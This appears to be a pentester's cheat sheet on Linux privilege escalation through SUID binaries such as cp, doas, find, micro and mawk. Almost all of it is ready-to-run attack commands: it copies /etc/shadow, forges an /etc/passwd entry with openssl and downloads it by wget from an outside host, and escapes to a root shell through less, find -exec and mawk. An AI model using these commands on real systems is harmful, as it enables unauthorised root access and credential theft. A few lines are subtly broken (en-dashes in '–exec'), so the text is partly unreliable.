SUID Files (enumerate candidates first: `find / -perm -4000 -type f 2>/dev/null`; only binaries that keep root's effective uid and can read/write/exec on your behalf are useful)

/usr/bin/cp

# cp -- Il cp is SUID, you can copy privilegied files to /tmp and read them
cp /etc/shadow /tmp

# generate new account
openssl passwd -1 -salt username password
# Then create a fake /etc/passwd file, upload it to the target and cp
wget http://192.168.1.111:8000/passwd
cp passwd /etc/passwd


/usr/bin/doas

# doas
cat /etc/doas.conf
doas /usr/bin/less /var/log/authlog
# Press v to escape vi then
:!sh


/usr/bin/find

# find
touch raj
find raj -exec "whoami" \;
find raj -exec "/bin/sh" \;

# another method
find /home –exec chmod u+s /usr/bin/wget \;
ls –la /usr/bin/wget
cat /etc/passwd
# then create another etc/passwd file and upload it


/usr/bin/micro

# micro editor
cat /etc/passwd | /usr/bin/micro

# Then generate another user
openssl passwd -1 -salt user3 pass123


/usr/bin/mawk

# mawk
mawk 'BEGIN {system("/bin/sh")}'